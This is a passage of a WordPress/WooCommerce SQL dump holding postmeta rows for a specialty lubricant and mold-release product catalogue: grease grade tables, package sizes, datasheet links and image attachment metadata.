style="text-align: center;" width="69">214</td>\r\n<td style="text-align: center;" width="69">215</td>\r\n<td style="text-align: center;" width="69">216</td>\r\n<td style="text-align: center;" width="69">217</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="69"><strong>GPL Anti-Corrosion Grades</strong></td>\r\n<td style="text-align: center;" width="69">220</td>\r\n<td style="text-align: center;" width="69">221</td>\r\n<td style="text-align: center;" width="69">222</td>\r\n<td style="text-align: center;" width="69">223\r\n\r\n(H-1 Certified)</td>\r\n<td style="text-align: center;" width="69">224</td>\r\n<td style="text-align: center;" width="69">225\r\n\r\n(H-1 Certified)</td>\r\n<td style="text-align: center;" width="69">226\r\n\r\n(H-1 Certified)</td>\r\n<td style="text-align: center;" width="69">227</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="69"><strong>Oil Viscosity Index</strong></td>\r\n<td style="text-align: center;" width="69">-</td>\r\n<td style="text-align: center;" width="69">-</td>\r\n<td style="text-align: center;" width="69">29</td>\r\n<td style="text-align: center;" width="69">92</td>\r\n<td style="text-align: center;" width="69">111</td>\r\n<td style="text-align: center;" width="69">124</td>\r\n<td style="text-align: center;" width="69">134</td>\r\n<td style="text-align: center;" width="69">145</td>\r\n</tr>\r\n<tr>\r\n<td width="69">\r\n<p style="text-align: center;"><strong>Estimated Useful Range</strong></p>\r\n<p style="text-align: center;"><strong>°F</strong></p>\r\n</td>\r\n<td style="text-align: center;" width="69">-94-150</td>\r\n<td style="text-align: center;" width="69">-94-220</td>\r\n<td style="text-align: center;" width="69">-81-270</td>\r\n<td style="text-align: center;" width="69">-76-310</td>\r\n<td style="text-align: center;" width="69">-60-355</td>\r\n<td style="text-align: center;" width="69">-33-400</td>\r\n<td style="text-align: center;" width="69">-33-500</td>\r\n<td style="text-align: center;" width="69">-22-550</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (1023, 347, '317_default_editor', '<table>\r\n<tbody>\r\n<tr>\r\n<td width="125">Syringe</td>\r\n<td width="125">Tube</td>\r\n<td width="125">Jar</td>\r\n<td width="125">Cartridge</td>\r\n<td width="125">Pail</td>\r\n</tr>\r\n<tr>\r\n<td width="125">0.5 oz.</td>\r\n<td width="125">2 oz.</td>\r\n<td width="125">0.5 kg</td>\r\n<td width="125">0.8 kg</td>\r\n<td width="125">5 kg</td>\r\n</tr>\r\n<tr>\r\n<td width="125">1 oz.</td>\r\n<td width="125">-</td>\r\n<td width="125">1 kg</td>\r\n<td width="125"></td>\r\n<td width="125">7 kg</td>\r\n</tr>\r\n<tr>\r\n<td width="125">2 oz.</td>\r\n<td width="125">8 oz.</td>\r\n<td width="125"></td>\r\n<td width="125"></td>\r\n<td width="125">20 kg</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (1024, 347, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (1025, 347, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (1026, 347, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (1027, 347, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (1028, 347, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (1029, 347, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (1030, 347, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (1031, 347, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (1032, 347, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (1033, 347, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (1034, 347, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (1035, 347, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (1036, 347, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (1037, 347, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (1038, 347, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (1039, 347, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (1040, 347, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (1041, 347, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (1042, 347, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (1043, 347, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (1044, 347, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (1045, 347, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (1046, 347, '_crosssell_ids', 'a:7:{i:0;i:769;i:1;i:783;i:2;i:784;i:3;i:788;i:4;i:789;i:5;i:790;i:6;i:814;}'); 
INSERT INTO `wp_postmeta` VALUES (1047, 347, '_product_version', '2.6.11'); 
INSERT INTO `wp_postmeta` VALUES (1048, 347, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (1049, 347, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (1050, 347, '_ywtm_priority_tab_description', '1'); 
INSERT INTO `wp_postmeta` VALUES (1051, 347, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (1052, 347, '_ywtm_content_tab_description', 'Krytox GPL 200–207 greases are white buttery greases with\r\nall of the same properties as the Krytox GPL 100–107 oils that\r\nthey are made from, but they are in grease form.\r\n\r\n&nbsp;\r\n\r\n<a href="https://www.miller-stephenson.com/wp-content/uploads/2016/08/GPL-PDF.pdf">GPL PDF</a>'); 
INSERT INTO `wp_postmeta` VALUES (1053, 347, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (1054, 347, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (1055, 347, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (1056, 347, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (1057, 347, '_product_image_gallery', '374,378,380,377,375,379,381'); 
INSERT INTO `wp_postmeta` VALUES (1058, 347, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (1061, 297, '318_custom_list_file', 'a:2:{s:32:"ace37cf06d0a770d9a74bc1f9b29c63a";a:3:{s:4:"name";s:16:"ReleaSys8200-TDS";s:4:"file";s:80:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/ReleaSys-8200-1.pdf";s:4:"desc";s:16:"ReleaSys8200-TDS";}s:32:"5baf288c8bd4aacbcf343e800fd12a34";a:3:{s:4:"name";s:25:"ReleaSys Product Overview";s:4:"file";s:89:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/ReleaSys-Product-Guide-1.pdf";s:4:"desc";s:25:"ReleaSys Product Overview";}}'); 
INSERT INTO `wp_postmeta` VALUES (1102, 293, '312_default_editor', '<strong>Physical Properties:</strong>\r\n<table style="height: 84px;" width="378">\r\n<tbody>\r\n<tr>\r\n<td width="111">Primary Polymer</td>\r\n<td width="159">Thermoset Polysiloxane</td>\r\n</tr>\r\n<tr>\r\n<td>Appearance</td>\r\n<td>White Emulsion</td>\r\n</tr>\r\n<tr>\r\n<td>Odor</td>\r\n<td>None</td>\r\n</tr>\r\n<tr>\r\n<td>Specific Gravity</td>\r\n<td>1.0 g/mL</td>\r\n</tr>\r\n<tr>\r\n<td>Flash Point</td>\r\n<td>None</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;'); 
INSERT INTO `wp_postmeta` VALUES (1103, 293, '317_default_editor', 'One Gallon, 5 Gallon, and 55 Gallon Drum'); 
INSERT INTO `wp_postmeta` VALUES (1104, 293, '318_custom_list_file', 'a:2:{s:32:"5275987022087c1e929cf2be994d0ccb";a:3:{s:4:"name";s:17:"ReleaSys 8500-TDS";s:4:"file";s:80:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/ReleaSys-8500-1.pdf";s:4:"desc";s:17:"ReleaSys 8500-TDS";}s:32:"5baf288c8bd4aacbcf343e800fd12a34";a:3:{s:4:"name";s:25:"Product Overview-ReleaSys";s:4:"file";s:89:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/ReleaSys-Product-Guide-1.pdf";s:4:"desc";s:25:"Product Overview ReleaSys";}}'); 
INSERT INTO `wp_postmeta` VALUES (1105, 293, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (1106, 293, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (1107, 293, '_ywtm_priority_tab_description', '10'); 
INSERT INTO `wp_postmeta` VALUES (1108, 293, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (1109, 293, '_ywtm_content_tab_description', '<strong>Physical Properties:</strong>\r\n\r\nPrimary Polymer:…...Thermoset Polysiloxane\r\nAppearance:………...White Emulsion\r\nOdor:…………………None\r\nSpecific Gravity:…….1.0 g/mL @ 25°C\r\nFlash Point…………..None\r\n\r\n<strong>Release Agent Applications:</strong>\r\n\r\nReleaSys 8500 is formulated to provide unmatched utility in injection and transfer molding with the following materials\r\n<table style="height: 68px;" width="473">\r\n<tbody>\r\n<tr>\r\n<td width="167">•          Plastics</td>\r\n<td width="168">•          Elastomers</td>\r\n</tr>\r\n<tr>\r\n<td width="167">•          Fluoroelastomers</td>\r\n<td width="168">•          EPDM</td>\r\n</tr>\r\n<tr>\r\n<td width="167">•          Acrylics</td>\r\n<td width="168">•          Epoxy</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;'); 
INSERT INTO `wp_postmeta` VALUES (1110, 293, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (1111, 293, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (1112, 293, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (1113, 293, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (1114, 363, '_wp_attached_file', '2016/08/1-oz-Dropper-Bottle.jpg'); 
INSERT INTO `wp_postmeta` VALUES (1115, 363, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:2988;s:6:"height";i:3244;s:4:"file";s:31:"2016/08/1-oz-Dropper-Bottle.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:31:"1-oz-Dropper-Bottle-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:31:"1-oz-Dropper-Bottle-737x800.jpg";s:5:"width";i:737;s:6:"height";i:800;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:31:"1-oz-Dropper-Bottle-768x834.jpg";s:5:"width";i:768;s:6:"height";i:834;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:33:"1-oz-Dropper-Bottle-1474x1600.jpg";s:5:"width";i:1474;s:6:"height";i:1600;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:31:"1-oz-Dropper-Bottle-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:31:"1-oz-Dropper-Bottle-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:31:"1-oz-Dropper-Bottle-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:31:"1-oz-Dropper-Bottle-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"6";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (1116, 364, '_wp_attached_file', '2016/08/2-oz-Dropper-Bottle.jpg'); 
INSERT INTO `wp_postmeta` VALUES (1117, 364, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:2988;s:6:"height";i:3029;s:4:"file";s:31:"2016/08/2-oz-Dropper-Bottle.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:31:"2-oz-Dropper-Bottle-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:31:"2-oz-Dropper-Bottle-789x800.jpg";s:5:"width";i:789;s:6:"height";i:800;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:31:"2-oz-Dropper-Bottle-768x779.jpg";s:5:"width";i:768;s:6:"height";i:779;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:33:"2-oz-Dropper-Bottle-1578x1600.jpg";s:5:"width";i:1578;s:6:"height";i:1600;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:31:"2-oz-Dropper-Bottle-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:31:"2-oz-Dropper-Bottle-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:31:"2-oz-Dropper-Bottle-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:31:"2-oz-Dropper-Bottle-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (1118, 365, '_wp_attached_file', '2016/08/4-oz-Bottle.jpg'); 
INSERT INTO `wp_postmeta` VALUES (1119, 365, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:2988;s:6:"height";i:3694;s:4:"file";s:23:"2016/08/4-oz-Bottle.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:23:"4-oz-Bottle-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:23:"4-oz-Bottle-647x800.jpg";s:5:"width";i:647;s:6:"height";i:800;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:23:"4-oz-Bottle-768x949.jpg";s:5:"width";i:768;s:6:"height";i:949;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:25:"4-oz-Bottle-1294x1600.jpg";s:5:"width";i:1294;s:6:"height";i:1600;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:23:"4-oz-Bottle-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:23:"4-oz-Bottle-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:23:"4-oz-Bottle-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:23:"4-oz-Bottle-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"6";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (1120, 366, '_wp_attached_file', '2016/08/8-oz-Dropper-Bottle.jpg'); 
INSERT INTO `wp_postmeta` VALUES (1121, 366, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:2988;s:6:"height";i:3244;s:4:"file";s:31:"2016/08/8-oz-Dropper-Bottle.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:31:"8-oz-Dropper-Bottle-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:31:"8-oz-Dropper-Bottle-737x800.jpg";s:5:"width";i:737;s:6:"height";i:800;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:31:"8-oz-Dropper-Bottle-768x834.jpg";s:5:"width";i:768;s:6:"height";i:834;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:33:"8-oz-Dropper-Bottle-1474x1600.jpg";s:5:"width";i:1474;s:6:"height";i:1600;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:31:"8-oz-Dropper-Bottle-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:31:"8-oz-Dropper-Bottle-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:31:"8-oz-Dropper-Bottle-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:31:"8-oz-Dropper-Bottle-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"6";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (1122, 367, '_wp_attached_file', '2016/08/20160812_104823-e1471523833601.jpg'); 
INSERT INTO `wp_postmeta` VALUES (1123, 367, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:2988;s:6:"height";i:5311;s:4:"file";s:42:"2016/08/20160812_104823-e1471523833601.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:42:"20160812_104823-e1471523833601-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:42:"20160812_104823-e1471523833601-450x800.jpg";s:5:"width";i:450;s:6:"height";i:800;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:43:"20160812_104823-e1471523833601-768x1365.jpg";s:5:"width";i:768;s:6:"height";i:1365;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:43:"20160812_104823-e1471523833601-900x1600.jpg";s:5:"width";i:900;s:6:"height";i:1600;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:42:"20160812_104823-e1471523833601-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:42:"20160812_104823-e1471523833601-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:42:"20160812_104823-e1471523833601-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:42:"20160812_104823-e1471523833601-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (1124, 368, '_wp_attached_file', '2016/08/20160812_104844-e1471523856224.jpg'); 
INSERT INTO `wp_postmeta` VALUES (1125, 368, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:2988;s:6:"height";i:5311;s:4:"file";s:42:"2016/08/20160812_104844-e1471523856224.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:42:"20160812_104844-e1471523856224-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:42:"20160812_104844-e1471523856224-450x800.jpg";s:5:"width";i:450;s:6:"height";i:800;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:43:"20160812_104844-e1471523856224-768x1365.jpg";s:5:"width";i:768;s:6:"height";i:1365;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:43:"20160812_104844-e1471523856224-900x1600.jpg";s:5:"width";i:900;s:6:"height";i:1600;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:42:"20160812_104844-e1471523856224-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:42:"20160812_104844-e1471523856224-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:42:"20160812_104844-e1471523856224-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:42:"20160812_104844-e1471523856224-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"6";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (1126, 369, '_wp_attached_file', '2016/08/20160812_104927-e1471523884728.jpg'); 
INSERT INTO `wp_postmeta` VALUES (1127, 369, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:2988;s:6:"height";i:5311;s:4:"file";s:42:"2016/08/20160812_104927-e1471523884728.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:42:"20160812_104927-e1471523884728-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:42:"20160812_104927-e1471523884728-450x800.jpg";s:5:"width";i:450;s:6:"height";i:800;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:43:"20160812_104927-e1471523884728-768x1365.jpg";s:5:"width";i:768;s:6:"height";i:1365;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:43:"20160812_104927-e1471523884728-900x1600.jpg";s:5:"width";i:900;s:6:"height";i:1600;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:42:"20160812_104927-e1471523884728-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:42:"20160812_104927-e1471523884728-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:42:"20160812_104927-e1471523884728-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:42:"20160812_104927-e1471523884728-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"5";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (1128, 370, '_wp_attached_file', '2016/08/20160812_104940.jpg'); 
INSERT INTO `wp_postmeta` VALUES (1129, 370, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5312;s:6:"height";i:2988;s:4:"file";s:27:"2016/08/20160812_104940.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:27:"20160812_104940-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:27:"20160812_104940-800x450.jpg";s:5:"width";i:800;s:6:"height";i:450;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:27:"20160812_104940-768x432.jpg";s:5:"width";i:768;s:6:"height";i:432;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:28:"20160812_104940-1600x900.jpg";s:5:"width";i:1600;s:6:"height";i:900;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:27:"20160812_104940-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:27:"20160812_104940-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:27:"20160812_104940-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:27:"20160812_104940-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"5";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (1130, 371, '_wp_attached_file', '2016/08/20160812_104953.jpg'); 
